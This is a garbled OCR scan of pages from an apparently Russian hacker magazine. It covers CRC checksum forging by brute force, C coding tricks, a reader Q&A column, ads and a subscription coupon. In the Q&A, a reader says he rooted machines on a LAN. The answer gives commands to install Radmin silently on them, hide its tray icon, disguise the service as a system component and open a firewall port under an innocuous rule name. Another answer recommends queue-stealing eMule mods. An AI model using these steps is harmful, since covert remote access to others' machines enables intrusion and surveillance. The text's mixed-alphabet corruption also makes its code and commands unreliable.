бором! Информационная стойкость СПС32 равна 32-м 
битам, дающим всего лишь 4.294.967.296 комбинаций. 
Учитывая высокую скорость вычисления СПС32, под- 
бор корректирующих байтов займет совсем немного 
времени — буквально минуты, а то и десятки секунд! 
Внедряем двойное слово, равное нулю, в произволь- 
ное место контролируемого блока и рассчитываем 
контрольную сумму по обычному алгоритму. Если 
СПС не ОК, увеличиваем двойное слово на единицу и 
продолжаем до тех пор, пока желаемое СПС не будет 
найдено. 

СПС16 подбирается вообще мгновенно! С СПС64, 
конечно, уже приходится основательно попых- 
теть, но быстрые табличные алгоритмы на мощ- 
ных процессорах найдут искомую комбинацию за 
несколько часов, ну в худшем случае, за ночь (тут 
все, конечно, от размера контролируемого блока 
зависит). 

СПС128 методом перебора уже не ломается (разве 
что задействовать сеть из нескольких машин), 
но элементарно восстанавливается по методике, 
описанной выше. 
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Со знаком или без 

Общеизвестно, что.((ипзідпесІ сИаг) ОхРР 
== (зідпеб сНаг) -1 ). Соответственно, на 
32-разрядных платформах ((ипзідпесі іпі) 
ОхРРРРРРРР == (зідпеб іпі) -1 ). Естественно, 
написать -1 намного быстрее и надежнее, 
чем пересчитывать Р. 

Вот конкретный пример хакерского кода: 



іог (а = 0; а < -1 1Л_; а++) ргіпЩ«%х\п»,а); 



Лишние аргументы 

Си не требует соблюдения прототипов функций, что 
открывает большие возможности для трюкачества. 
Поскольку аргументы заносятся справа налево (то 
есть на вершине стека оказывается крайний левый 
аргумент), а стек чистит материнская функция, то 
лишние аргументы попросту игнорируются. И вот тут 
( начинается самое интересное. Поскольку в качестве 
аргументов можно использовать выражения (а 
выражением в си, как уже говорилось, может быть 
практически все, что угодно), мы получаем мощный 
инструмент для борьбы с фигурными скобками. Вот, например: 




С точки зрения «нормального» прикладного программиста, этот 
код вообще не должен работать, поскольку (0 > -1 ), и цикл ни разу 
не выполнится. Но ведь это не обычный -1 , а с суффиксом 1Л_, что 
равносильно конструкции ((ипзідпесі іпі) -1 ), после преобразова- 
ния которой мы получим ОхРРРРРРРР. 

Развиваю мысль дальше: можно не только сократить исходный 
текст, но и оптимизировать машинный код. 

Возьмем конструкцию вида («правильный» вариант проверки 
диапазона): 

зідпесІсГіагх, у; 
іт ((х > 0) && (х < у)) . . . 

Для хакеров очевидно, что проверка на положительное значение 
х избыточна и от нее легко избавиться, переписав код так: 

Іі((ипзідпес1 іпі)х<у)) ... 



іДа) 

{ 

х += і(а); іі (п < МАХ) п++; 

} 

Первым делом освобождаемся от оператора іі, преобразуя его в 
выражение: ((п < МАХ) && п++), и передаем его функции і() как 
«сверхплановый» аргумент: 

іі (а) х += і(а, ((п < МАХ) && п++)); 

Расплатой за хакерство становится снижение читатебельности 
листинга, не говоря уже о том, что «лишние» аргументы требуют 
дополнительного стекового пространства, к тому же порядок 
вычисления аргументов в си не определен, поэтому без лишней 
нужды прибегать к этому трюку не стоит, а лучше воспользовать- 
ся оператором «запятая», описанным в хаке №3. 








Забытая запятая 

Изобилие фигурных скобок сильно раздражает, и возникает ес- 
тественное стремление записать весь зіаіетепі одной строкой. 
Рассмотрим типичный фрагмент кода, написанный «правиль- 
ным» программистом: 

й(п>1) 



р гі п1:Т( « %сІ\п » , х); п=0; а++; 



А вот тот же самый код, написанный хакером. Как говорится, сравни и найди отличия: 
іДп >1) ргіпЩ«%сІ\п», х), п = 0, а++; 

Фигурные скобки «волшебным» образом исчезают, а вместе с ними исчезает и точка из 
знака «точка с запятой», в результате чего наглядность листинга значительно повышает- 
ся. Постоянно разделяя операторы знаком точки с запятой, большинство программистов 
почему-то забывают об обыкновенной запятой, используемой для разделяющих выра- 
жений, но в си практически все что угодно может быть выражением!!! 



Функции под вопросом 

Начнем с классики (см. выше 1 ). На вопрос: «Что этот код 
делает?» большинство прикладных программистов убежденно 
отвечают: «Не компилируется». Те же из них, кто все-таки не по- 
ленится проверить и откомпилировать, едут крышей и остаток дня 
проводят в размышлениях, как такое вообще может работать? 

\ = (!Іад?5Іп:соз)(х); 

Хороший тест на значение языка. Что данный код делает, понятно и без подсказки, 
достаточно открыть описание оператора «?», но объяснить, как он это делает, может 
только гуру. 

При использовании имени функции в качестве выражения, компилятор возвращает 
на нее указатель. Таким образом, в зависимости от значения ТІад’а, будет выбран либо 
тот, либо иной указатель, заключенный, согласно правилам языка, в круглые скобки и 
ожидающий аргументов, в роли которых в данном случае выступает (х). 

А теперь попробуй переписать этот хак на классический 
манер и сравни размер программы и откомпилирован- 
ного кода. 





Обмен зна- 
чений двух 
переменных 

Вопрос: сколько 
времени потре- 
буется рядовому 
программисту, 
чтобы понять, что 
происходите пе- 
ременными хи у? 



х Л = у л= х л =у; 



Давай разобьем это выражение натри: 
«х л = у; у л = х; х л = у;», для нагляднос- 
ти записав их так: 

1 . х = хХОВу; 

2 . у = уХОВх; 

3. х = хХОВ у; 

Повторное наложение И, исключаю- 
щего ИЛИ, независимо от порядка ар- 
гументов, как известно, дает исходный 
результат, но в строках 1 и 2 аргументы 
меняются местами, следовательно, 
после выполнения шага 2 в переменной 
у окажется х, а сам х будет содержать 
«смесь» (х ХОВ у), из которой на шаге 
3 «изымается» прежний х и остается 
чистый у. Короче, происходит обмен 
значений двух переменных, без привле- 
чения третьей. 

Красиво, но, увы, по скорости и объему 
машинного кода сильно проигрывает 
стандартному «Ітр = х; х = у; у = Ітр; », 
поэтому пользоваться данным хаком не 
рекомендуется. 
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Окрытые возможности 
цикла Іог 

Вот еще один типичный при- 
мер кода, написанный «пра- 
вильным» программистом 
(инициализация переменной 
перед входом в цикл): 



х = 0; 

іог(а = 0; а< п; а++) 



И(Ю)х++; 



Инициализация переменной х перед входом 
в цикл занимает целую строку и придает 
листингу некоторую небрежность. И это при- 
том, что в каждом учебнике написано, что си 
допускает множественную инициализацию 
в циклах. Ну и что с того, что х не является 
параметром цикла? Компилятору ведь все 
равно, и никакой хакер не успокоится, пока 
не перепишет этот код так: 

Іог (а = 0, х = 0; а < п; а++) 



И(Ю)х++; 



При большом количестве переменных это 
здорово выручает! А вот еще более конк- 
ретный пример. В «каноническом» виде он 
выглядит так: 

Подсчет суммы 
зит = 0; 

Іог (а = 0; а < п; а++) зит += І(а); 

А если избавиться от тела цикла, поместив 
весь код в заголовок так: 

Іог (а = 0, зит = 0; а < п; зит += І(а), а++); 

А вот еще более оптимизированный вариант: 

Іог (а = 0, зит = 0; а < п; зит += І(а++)); 




Объявление функций вручную 

Программирование под ѴѴіпбоѵѵз требует 
включения огромных іпсіибе-файлов, заметно 
снижающих скорость трансляции, что 
раздражает. Но ведь необходимые функции 
можно объявить и самостоятельно! Следить 
за соблюдением прототипов не обязательно, 
главное — указать компилятору, чтобы он 
вызывал их по соглашению зібсаіі: 



// #іпсІисІе <ѵѵіпсіо\л/з.іп> 

іпі зісісаіі МеззадеВохА(); 

таіп() 

{ 

МеззадеВохА(0,»ИеІІо,заіІог»,»ИеІІо»,0); 

} 

//компиляция: сі.ехе ІіІе_пате.с ІІЗЕВ32.ІІЬ 




Отказ от кучи и динамической памяти 

Любовь программистов к динамической памяти с позиций здравой 
логики ничем, кроме мракобесия, необъяснима. Куча — это тормоза 
и потенциальные утечки, про борьбу с которыми написано столько, 
что я не буду заострять на этом внмания. 

Хакеры активно используют статические массивы, выделяемые опе- 
рационной системой еще на стадии загрузки файла, а динамическая 
память выделяется/освобождается каждый раз! Рассмотрим следую 
щий «пионерский» код, который можно встреть даже в профессио- 
нальных программах: 



іІ(сГіаг*з) 



р = таІІос(зІ 2 еоІ(з) + 1 ); 

іі (зотеІИІпд_доез_ѵѵгопд) геіигп -1 ; //ошибка! преждевременный выход 

Ігее(р); 
геіигп ѵаі; 

} 



Кажущаяся потребность в динамической памяти объясняется переменным размером 
строки з, передаваемой функции І(). И все было бы хорошо, если бы не коварная ошиб- 
ка, приводящая к преждевременному выходу из функции без освобождения! 

А вот «хакерский » вариант, использующий статическую память вместо хипа: 

іІ(сГіаг*з) 



зіаііс сГіс р[МАХ_Р055ІВІ_Е_5І2Е]; 

ІІ ((5І2еоІ(з)+1 )> МАХ_Р055ІВІ_Е_ЗІ2Е) -1 ; 

ІІ (5отеІІпіпд_дое5_\л/гопд) геіигп -1 ; 

геіигп ѵаі; 

} 



Мы увеличили производительность, избавились от проблем с утечками, но... сделали 
функцию нерентабельной. В практическом плане это означает невозможность рекурсии 
(но в данном случае функция заведомо не рекурсивна), и запрет на одновременный вызов 
функции из двух и более потоков, иначе в статическом массиве образуется « мешани- 
на» данных и наступит крах, предотвратить который можно либо путем принудительной 
синхронизации (критические секции, мутанты), либо через локальную память потока, 
известную под аббревиатурой ТЗІ_. Впрочем, учитывая корявость поддержки этой самой 
ТЗІ_ нынешними компиляторами, ни один здравомыслящий хакер ни за что ей не восполь- 
зуется. 







входа явно: 



Программирование без ВТ1. 

По умолчанию си-программы собираются вместе с библиоте- 
кой времени исполнения (она же ВТІ_), которая занимает много 
килобайт и обеспечивает работу функций типа зргііпі. Но ведь 
ѴѴіпбоѵѵз ІМТ уже включает в себя Р?ТІ_, реализованную в І\ІТОІ_І_. 
ОІ_І_, так зачем же нам еще одна? 

Чтобы собрать программу без ВТ!_, достаточно назвать главную 
функцию не таіп, а как-нибудь иначе, например _зІагІ. Умные 
линкеры сами поймут, что это — точка входа. Г лупым (к которым , 
в частности, относится М3 ШКЕР) потребуется указать точку 



сі.ехе /с ІІІе_пате.с /Ох 

Ііпк.ехе ІІІе_пате.оЬі /ЕЫТВУіБІагІ/ЗиВЗУЗТЕМіѴѴІМООѴѴЗ УЗЕР32. МЬ 



Сравнивая размеры программы с ВТІ_ и без нее, мы практически не обнаружим разницы 
в размерах, поскольку минимальная кратность выравнивания в 9х составляет 4 Кб, она 
же используется линкером по умолчанию. В І\ІТ минимальная кратность составляет всего 
1 6 байт, но линкер отказывается собирать такой файл, пока мы не притворимся, что 
собираем драйвер: 



Ііпк.ехе ІІІе_пате .оЬ] /ЕІ\ІТВѴ:5ІагІ ІІЗЕВ32.ІІЬ /ОВІѴЕВ /АІ_ЮІ\І: 1 6 

На этом примере, при компиляции М3 ѴС 6 с ВТІ_ размер исполняемого файла состав- 
ляет 24,576 Кб, без РГП_ — 1 6,384 Кб и, наконец, без НТІ_ с минимальным выравнивани- 
ем — 816 байт. Как говорится, почувствуй разницу! з: 
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Новейшие 



Компания "Ф-Центр" рекомендует Місгозой® ѴѴіпсІоѵѵз® ХР. 
На компьютеры РІехІюп устанавливаются подлинные 
продукты семейства МісгозоЯ® ѴѴіпсІоѵѵз®. Гарантией 



качества и сервисной поддержки приобретаемых Вами 



продуктов МісгоэоЯ® является наличие сертификата 



подлинности (Сегійісаіе о( АиЛтепІісіІу). 



© ЕДИНЫЙ СПРАВОЧНЫЙ 



( 495 ) 105 - 64-47 




При покупке компьютера Ріехігоп 
Махіта О получи карту постоянного 
покупателя в магазинах "Ф-Центра" 
в подарок. 



1НТР 



САЛОНЫ-МАГАЗИНЫ: 
ст.м.'Ъабушкинская", ул.Сухонская, 7А 
ст.м."Улица 1905 года", ул. Мантулинская, 2 
ст.м.'Ъладыкино", Алтуфьевское ш., 16 



ФОТО ИНТЕРНЕТ КАФЕ: 

ст.м. "Владыкино", Алтуфьевское ш., 16 

СЕРВИС-ЦЕНТР: 

ст.м.'Ъабушкинская", ул. Молодцова, 1 



4000 наименований товаров Самый выгодный кредит за 15 мин. Время работы: 10-20, без 
выходных Бесплатная доставка* Удобная автостоянка Пункт обмена валюты Оплата 
кредитными картами Подарки покупателям Техническая поддержка Магазин 
аксессуаров Магазин компьютерной литературы 

* полную информацию о товарах и услугах в конкретных магазинах компании «Ф-Центр» уточняйте на сайте ѴУѴѴ ѵѵ.Гсепіег.ги 



ѵѵѵѵѵѵ.ЯехІгоп.ги 



Ле7\ігфп 



>п являются товарными знаками или заре- 




интернет-магазин 



ѵѵѵѵѵѵЛсепІег.ги 







СТЕПАН ИЛЬИН АКА 5ТЕР 

/РАО@НЕАЬ. ХАКЕР. ВІІ/ 




іаа@геаІ .хакер, ги 



О: Говорят, что прокси-сер- 
веры из публичных источ- 
ников находятся в черном 
описке. Такой описок дейс- 
твительно существует? 

А: Разумеется. Если существуют програм- 
мы вроде РгохуЫзІ ОгаЬЬег ( ѵѵѵѵѵѵТІпаІІіит- 
ІесН.сот Т которые извлекают заветные 
проксики из публичных источников и от- 
фильтровывают дубликаты, то почему бы 
не использовать аналогичные средства 
для создания блэк-листа? Так что подоб- 
ные блэк-листы активно развиваются и 
используются электронными платежными 
системами для отслеживания любителей 
оставаться инкогнито. Узнать, находится ли 
твоя прокся в черном списке или нет, можно 
по адресу: ѵѵѵѵѵѵ.ѵѵИоіз.зс . 

О: Что такое подкаст? 

А: иѵеіоигпаі.сот и прочие онлайн-дневники 
уже не торкают сетевую общественность так, 
как это было несколько лет назад. Они поп- 
росту приелись. Новый способ вывернуть 
трусы наизнанку в инете — это так называ- 
емые аудиоблоги. Отныне ты можешь выра- 
зить мысли о наболевшем не в письменном, 
а в устном виде. Что-то вроде онлайн-радио, 
но в несколько другом формате, периодичес- 
ком. Так вот лента или дневник, на котором 
выложены аудиосообщения, и называется 
подкастом. Само слово подкаст произошло 
от названия плеера іРосІ и английского сло- 
ва Ьгоасісазііпд (вещание). Благодаря спе- 
циально составленной Р38-ленте подкаст 
легко может быть прослушан на этом плеере. 
Аудиоблоги хостятся на специальных ресур- 
сах — подкаст-терминалах. В России такой 
ресурс тоже есть. Он называется Виззіап 
Робсазііпд ( ѵѵѵѵѵѵ.гиззіапросісазііпа.ги ) и уже 
успел завоевать большую популярность. 



О: В статье «Побег из 
ѴМѵѵаге» Крис написал о 
том, каким образом моле- 
но выбраться за пределы 
ѴМѵѵаге. Ау меня такой воп- 
рос: как из основной сис- 
темы повлиять на гостевую 
ОС, не запуская виртуаль- 
ную машину? ѴМѵѵаге созда- 
ет для каждой в и рту а л ки 
специальные файлы — мо- 
жет быть, через них? 

А: Действительно, для каждой виртуаль- 
ной машины ѴМѵѵаге создает файл-образ, в 
котором хранится информация о виртуаль- 
ном жестком диске, его разделах, разме- 
щенных данных и т.д. Долгое время формат 
этого файла держался в секрете и лишь 
недавно разработчики опубликовали его. 
Все необходимое описано в спецификации 
ѴІѴЮК (ѴігіиаІ МасИіпе Оізк Рогтаі), скачать 
которую можно с сайта ѵѵѵѵѵѵ.ѵтѵѵаге.сопп/ 
іпІеіТасез/ѵтсІк.ІіІтІ . Г отовых продуктов для 
манипулирования с этими образами, поми- 
мо самой ѴМѵѵаге, в публичных источниках 
пока нет. Но, быть может, подобный софт 
напишешь ты? 



О: Посмотрел видео оѴѴМР- 
баге и оперативно порутал 
десяток машин в локальной 
сети. Но доступ к команд- 
ной строке — это не предел 
мечтаний. Как бы незамет- 
но установить там сервер 
Пасітіп? 

А: Да, по умолчанию Расітіп устанавли- 
вается с помощью специального мастера 
с графическим интерфейсом. Поэтому 
придется пойти на хитрость и использовать 
файлы уже установленного пакета. Нам 



понадобятся г_зегѵег.ехе, АсІпгОІ.сІІІ, габсігѵ. 
сІІІ. Их необходимо передать на удаленный 
сервер, например, с помощью РТР. Когда 
файлы будут на зараженной системе, от 
тебя требуется лишь выполнить несколь- 
ко команд. Во-первых, осуществить скры- 
тую установку с помощью ключей /іпзіаіі 
/зііепсе: 



г_зегѵег.ехе /іпзіаіі /зііепсе. 



И, собственно, запустить сервис на задан- 
ном порте, установив на сервер пароль: 



г_зегѵег.ехе /рогі: порт /разз:пароль/заѵе /зііепсе. 



Предательскую иконку Васітіп’а в трее 
можно убрать через реестр: 



ЧЕО АйО НКЬМ\ЗУЗТЕМ\РАсІтіп\ѵ2.0\Зегѵег' 
^агатеіегз /ѵ ОізаЫеТгауІсоп Д РЕО_ВІЫАРУ /с 
Э0000001 Д 

СІѴЮ>ВЕ(3 АйР НКЦМ\5УЗТЕМ\Сиггеп!Соп!гоІЗе1' 
Зегѵісез\г_зегѵег /ѵ ОізріауМате Д РЕ0_32 /с 
'Зегѵісе Нозі СопІгоІІег" Д 



Если на удаленной системе установлен 
файрвол, то первое подключение, скорее 
всего, закончится неудачей. Тебе необхо- 
димо нейтрализовать брандмауэр, отклю- 
чив его или добавив в его конфиг правило, 
разрешающее подключение к Вабтіп-сер- 
веру. В случае со стандартным файрволом 
такоеправиломожнодобавитьчерезкоман- 
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Попробуйте подписаться в редакции, позвоните нам. 



(это удобнее, чем принято думать 
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5УЫС Лучшие цифро- Хакер Хакер Спец Железо Страна Игр РС Игры Мобильные 



вые камеры компьютеры 




Махі Типіпд Тоіаі 0\Ю 0\Ю Эксперт Тоіаі РооІЬаІІ ОпЬоагсІ Моипіаіп Віке Хулиган Свой бизнес 

Асііоп 



★ Для подписчиков в Москве курьерская 
доставка БЕСПЛАТНО в день выхода журнала 

★ Дешевле, чем в розницу 

★ Гарантия доставки и замены в случае потери 

★ Специальные предложения для подписчиков 

★ Первый номер подписки высылается по звонку 
вместе с заполненной квитанцией для оплаты 



8 - 495 - 780 - 88-29 (для Москвы) 
8 - 800 - 200 - 3-999 (для России) 

ВСЕ ЗВОНКИ БЕСПЛАТНЫЕ 

Мы работаем с 9 до 18 по рабочим дням 








дную строку: пеізб ТігеѵѵаІІ асісі рогіорепіпд 
ТСР порт_радмина гасітіп. Последний ключ 
представляет собой название правила, по- 
этому его можно переименовать во что-ни- 
будь более незаметное, чтобы не мозолил 
глаза в списке процессов. 



О: Решил больше не эко- 
номить на анонимности и 
купить себе ѴРІМ -аккаунт. 
Только вот какой брать: 
ОрепѴРЫ или просто ѴРЫ? 
А: Однозначно сказать, что лучше, а что 
хуже, нельзя. Каждый из видов подклю- 
чения имеет свои положительные и отри- 
цательные стороны. Начнем с ѴРІЧ. Этот 
способ универсален, поскольку ѴРІЧ-со- 
единение может быть установлено на лю- 
бой машине и любой ОС. ВѴѴіпсІоѵѵз-системах 
тебе не нужно заботиться о дополнительном соф- 
те — все необходимое включено в состав 
ОС по умолчанию. Более того, настроить 
такое подключение — пара пустяков. Ввес- 
ти имя, пароль, ІР сервера и тип аутентифи- 
кации с помощью мастера сможет каждый. 
Важно и то, что данные, передаваемые по 
ѴРІЧ-каналу, упаковываются и шифруются. 
С другой стороны, некоторые провайдеры 
(например, сотовые операторы) блокируют 
ОРЕ-пакеты и таким образом препятствуют 
использованию ѴРІЧ. Еще один минус: обыч- 
ный ѴРІЧ нельзя пропустить через внешний 
ргоху/ЗОСКЗ-сервер. 
ТеперьпарусловобОрепѴРІЧ.Какизвестно, 
это самостоятельное приложение, поэтому 
его придется дополнительно устанавливать 
и настраивать. Настройка нетривиальная 
и состоит из нескольких пунктов, поэтому 
придется немного попыхтеть. К счастью, во- 
оружившись подробными мануалами, пых- 
теть придется не так много — едва ли весь 
процесс займет больше 15 минут. На этом 
недостатки заканчиваются, дальше — одни 
плюсы . ОрепѴРІЧ эффективно сжимаеттра- 
фик, поэтому соединение более быстрое и 
устойчивое, чем в случае с ѴРІЧ. Для шиф- 
рования трафика используются алгоритмы 
ІѴЮ5-НМАС, ВЗА с 2048-битным ключом. 
Расшифровать поток данных невозможно. 
А еще больше анонимности можно добить- 
ся, пропустив ОрепѴРІЧ-соединение через 
ЗОСКЗ-сервер. 



О: На многих сайтах, в том 
числе и на ѵ\ллллг. хакер, 
ги, размещается реклама 
Соодіе. На этом действи- 
тельно можно срубить де- 
нег? 

А: Основные доходы компании Ооодіе 
приносит реклама. Механизм системы 
построен на двух основных технологи- 
ях, напрямую связанных между собой: 



АбѴѴогсІз для рекламодателей и АбЗепзе 
для владельцев сайтов. Рекламодатели 
обращаются в АбѴѴогбз с просьбой о раз- 
мещении рекламы, подробно описывая ее 
целевую аудиторию. Оплата производится 
за клик: пришел посетитель — заплати. 
В свою очередь, рекламные объявления 
размещаются на сайтах, зарегистриро- 
ванных в системе АбЗепзе. Фишка в том, 
что Ооодіе АбЗепзе отображает на сайте 
только те текстовые и графические объяв- 
ления, которые подходят тематике сайта. 
Благо с мощностями Ооодіе и его проду- 
манными алгоритмами проанализировать 
содержимое сайта не составит труда. Оп- 
лата веб-мастерам опять же осуществля- 
ется за каждый клик или тысячу кликов. 
Вознаграждение зависит от множества 
факторов и варьируется от 3 до 150 цен- 
тов за клик, причем высылается по почте 
чеком суммами от 100 долларов. Заранее 
определить величину вознаграждения 
нельзя — для этого нужно зарегистриро- 
ваться в системе. Как говорится, поставь и 
проверь, а потом сделай выводы. В любом 
случае, ты ничего нетеряешь и, болеетого, 
получишь шанс быть замеченным прямы- 
ми рекламодателями. По адресу: ѵѵѵѵѵѵ. 
ѵѵеЬта5ІегѵѵогІб.сот/іогит89/13028.Ніт 
располагается отличная статья для нович- 
ков, с подробными комментариями и кон- 
кретными цифрами. Резюмирую: на этом 
действительно можно заработать. 



О: Намедни вышел свежий 
релиз РгееВЗО 6.1. На сер- 
вере установлена 6.0 вер- 
сия, стоит ли апдейтить 
ОС? Очень боюсь краха 
системы — начальство го- 
лову снесет. 

А: На самом деле, изменений в ЕгееВЗЭ 
6.1, по сравнению с предыдущей версией, 
не так много. Несколько оптимизаций, на- 
целенных наулучшение производительнос- 
ти, море небольших багфиков и несколько 
новых функций. В том числе: 

• Мультиплексор для клавиатуры, который 
наконец-то позволитодновременно исполь- 
зовать как РЗ/2, так и БІЗВ-варианты клавиа- 
туры, причем без лишних заморочек; 

• множество багфиксов, связанных с фай- 
ловой системой. О проблемах можно прочи- 
тать на форумах, они действительно были; 

• ЕгееВЗЭ теперь более дружественна по 
отношению к ВІиеіооіИ-адаптерам. Многие 
из них будут настроены в системе автома- 
тически; 

• Удобнее будет работать с ЗАЗ- и ЗАТА 
ВАЮ-контроллерами. 

Если речь идет о сервере, то изменения не 
так критичны. Так что необходимости в ап- 
дейте нет. 



О: Много раз слышал о так 
называемых модисрикаций 
еМиІе Г ілллллг.етиіе-ргоіесі. 
пеі), которые якобы позво- 
ляют быстрее закачивать 
файлы. Можешь расска- 
зать подробнее? 

А: Различных модификаций еМиІе сущес- 
твует великое множество. Это возможно за 
счет свободно распространяемых исход- 
ников Р2Р-клиента. Каждый из них имеет 
свои уникальные особенности, в том числе 
и не совсем честные. В Сети доступны так 
называемые личерские варианты осла, ко- 
торые позволяют обходить очередь и быс- 
тро закачивать файлы. Втой или иной мере 
такими клиентами являются: 
еМиІе 1_ЗР — этот мод осла славится тем, 
что ворует очереди. 

Етиіе Моб по иріоасі — позволяет полно- 
стью отменить отдачу (иріоасі) файлов. 
НеЬМиІе — с помощью изощренной кре- 
дитной системы позволяетбыстро переме- 
щаться по очереди и быстрее стартовать 
закачки. 

Официальные сайты МСЮ’ов давно закры- 
ты, поэтому клиентов придется искать в 
закромах у других пользователей пирин- 
говых сетей. Но злоупотреблять ими не 
советую: многие серверы быстро палят 
личерских клиентов и банят пользователя, 
в том числе по ІР-адресу. 

О: Что такое НОТѴ и ІРТѴ? 

А: НЮТѴ (сокр. НідН ЭеІіпШоп Теіеѵізіоп, 
Телевидение высокой четкости) — широ- 
коэкранное телевидение, использующее 
цифровой звук и отличающееся высокой 
четкостью. РЮТѴ имеет более высокое раз- 
решение по сравнению со стандартным 
телевидением. Если у обычного ТВ разре- 
шение равно 720x480 для системы ІЧТЗС 
и 720x576 для системы РАБ, то в случае 
РЮТѴ это уже 1920x1080 (1080І) и 1280x720 
(720р). Буква іозначаетто, что видео идет со 
скоростью 50 или 60 полукадров в секунду 
(Іпіегіасеб). Режим позволяетуменьшить по- 
ток данных при передаче видео, но ухудша- 
ет качество картинки динамических сцен. 
Индекс указывает, что видео будет отобра- 
жаться со скоростью 24, 25, 30, 60 полных 
кадров в секунду (Ргодгеззіѵе 8сап). Такое 
видео выглядит более естественно, но уве- 
личивает поток данных. РЮТѴ не имеет стан- 
дартов для передачи видео в формате 4:3 и 
поддерживает только 16:9. Еще один важ- 
ный плюс: поддержка различных цифровых 
форматов, вплоть до ЭоІЬу Эідііаі 5. 1 . 

ІРТѴ (Іпіегпеі РгоіосоІ Теіеѵізіоп, Телевиде- 
ние посредством Интернета) — технология 
цифрового телевидения, доставляемого 
абоненту по ІР-протоколу, с использовани- 
ем широкополосного подключения, з: 
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:и Кагантип! 



вопросы: 



Призы: 

1 место -визы (5 штук). Дают право многоразового прохода на 
территорию Республики Кагантип в период с 1 5 июля 

по 26 августа. 

2 место-трусы ЩАСТЬЕ(5 штук). Крутые трусы редкой «горош- 
ковой» расцветки, в этом году официально принятой 

на Кагантипе. 

3 место - 1 урок кайтинга (5 штук). Поможет тебе встать накайт 
и покорить всех девчонок вокруг крутыми трюками. 



Поискать подсказки тебе лучше всего на сайте \ллллл/.кагапііра.пеІ 
Свои ответы присылай до 5-го июля на хакѳр@кагапііра.пѳ1 . 

За призами приезжай в Республику Кагантип с 1 5 июля 
по 26 августа! 



В честь чего на входе в Республику Кагантип была воздвигнута Три 
умфальная Арка? 

• В честь победы вселенского добра над вселенским злом 

•ѵ В честь победы сил д< над силами разума 

• В честь победы над крымским менталитетом 



Что за архитектурное сооружение носи^З 

• Туалетно-развлекательный комплекс 

• Правительственный белый дом 

• Черти что! 



» яется привилегированной элитой в Республике и обладает 
прохода к туалетам вне очереди? 
іческая интеллигенция и народные артисты 
іительство и друзья народа 
• Одесские фрики 
• Весь великий народ 
Щастье рядом! 



Что дает право безвизового прохода на территорию Респубілі 
• Фрик-мобиль _ ^ ш - 



Желтый чемодан 

Удостоверение ФСБ, ОБЭП, СЭС и т.д. 
Президентский статус 



Кем хотел быть в детстве Президент Республики? 

• Спортсменом 

• Космонавтом 

• Аферистом 

• Президентом мира 



Какая отрасль промышленностшсчитается в Республике основной] 
и что экспортируют в другие стр»ы мира? 

• Мылосериальное производствъ - мыло и сериалы. ^ 

• Производство веников из казаі\ипских пальм - веники 

• Щастьедобывающая промышленность - щастье 

• Производство иллюзий и мистификаций - глобальные иллюзии 

• Фабрика звезд - экспортирует зве А шоу-бизнеса 



Что сказал Президент в своей знаменатетьной речи в 
когда Республика переехала в очередной ваз? 



Что является национальной едой казантипсі\го народа? 



Что такое Кагантип? 



Что бы ты сделал, если бы стал вдруг Президентом гесущесті 

\ ' 



ющего 








«Хакер» + 0\Ю 


1 830р ЗА 6 МЕСЯЦЕВ 


990р ЗА 6 МЕСЯЦЕВ 


ЗбООр ЗА 12 МЕСЯЦЕВ 



1 920р ЗА 12 МЕСЯЦЕВ 

« Хак е р» + «Хак е р и » 





РЕДАКЦИОННАЯ 

ПОДПИСКА 



1 Заполнить купон и квитанцию 

2 Перечислить стоимость подписки через Сбербанк 

3 Обязательно прислать в редакцию копию оплаченной 
квитанции 

с четко заполненным купоном любым из перечисленных 
способов: 

по электронной почте: зиЬзсгіЬе@дІс.ги; 
по факсу: 8-495-780-88-24; 

по адресу: 119021 , Москва, ул. Тимура Фрунзе, д. 1 1 , стр. 44-45 



«Хакер» + 0\Ю 



990р ЗА 6 МЕСЯЦЕВ 
1920р ЗА 12 МЕСЯЦЕВ 

«Хакер» + «Хакери» 

1830р ЗА 6 МЕСЯЦЕВ 
ЗбООр ЗА 12 МЕСЯЦЕВ 



ВНИМАНИЕ! 

подписка оформляется в день обработки купона и квитанции. 

Купоны, отправленные по факсу или электронной почте, обрабатываются 
в течение 5 рабочих дней. Купоны, отправленные почтой 
на адрес редакции обрабатываются в течение 20 дней. 

Рекомендуем использовать электронную почту или факс. 



Подписка 

для юридических лиц 

Москва: ООО «Интер-Почта», 
тел.: 500-00-60, ѵѵѵѵѵѵ.іпІегросИІа.ги 



Подписка производится с номера, выходящего через один календарный месяц 
после оплаты. Например, если произвести оплату в сентябре, то подписку 
можено оформить с ноября. 

По всем вопросам, связанным с подпиской, звони по бесплатным 
телефонам: 780 - 88-29 (для москвичей) и 8 - 800 - 200 - 3-999 (для регионов и 
абонентов Билайн, МТС и МегаФон). 



Для получения счета на оплату подпис- 
ки нужно прислать заявку с названием 
журнала, периодом подписки, банковс- 
кими реквизитами, юридическим и поч- 
товым адресом, телефоном и фамилией 
ответственного лица за подписку. 



Дг: 

IV 



ПОДПИСНОЙ КУПОН 

Прошу оформить подписку: 



на журнал Хакер + БѴБ 
на комплект Хакер+ ОУО и Хакер Спец + СО 



□ 



на | | месяцев 

начиная с 



200 г. 



|—| Доставлять журнал по почте 
1 на домашний адрес 
|—| Доставлять журнал курьером на 
1 адрес офиса (по г. Москве) 

Подробнее о курьерской доставке читайте ниже 



(отметьте квадрат выбранного варианта подписки) 

Ф.И.О. 



ПП. ПП. ППг. 

день месяц год 

АДРЕС ДОСТАВКИ: 

индекс 

область/край 

город 

улица 

дом корпус 

квартира/офис 

телефон ( ) 

код 

е-таіі 

сумма оплаты 

* Курьерская доставка осуществляется только по Москве 
на адрес офиса. Для оформления доставки курьером 
укажите адрес и название фирмы в подписном купоне. 



Извещение 



ИНН 7729410015 ООО «Гейм Лэнд» 

ЗАО ММБ 

р/с № 40702810700010298407 



к/с № 30101810300000000545 



БИК 044525545 




КПП -772901001 


Плательщик 


Адрес (с индексом) 


Назначение платежа 
Оплата за « 


» 


Сумма 


с 


200_ г. 





месяц 



Кассир 



Ф.И.О. 

Подпись плательщика 



Квитанция 



ИНН 7729410015 ООО «Гейм Лэнд» 

ЗАО ММБ 

р/с № 40702810700010298407 



к/с № 30101810300000000545 



БИК 044525545 




КПП -772901001 


Плательщик 


Адрес (с индексом) 


Назначение платежа 




Сумма 


Оплата за « 


» 




с 


200_ г 





месяц 



Ф.И.О. 



Кассир 



Подпись плательщика 




АІМТОМ ОЗТАРЕТЗ ака 05МІІІМ 



5НАРЕѴѴАРЕ2 



Оігесіогу Ызіег 

Версия: 0.9.1 от 18.01.2006 

Операционная система: ѴѴіпсІоѵѵз 98, Ме, І\ІТ, 2000, ХР 
Распространение: бесплатно 
Размер: 588 Кб 
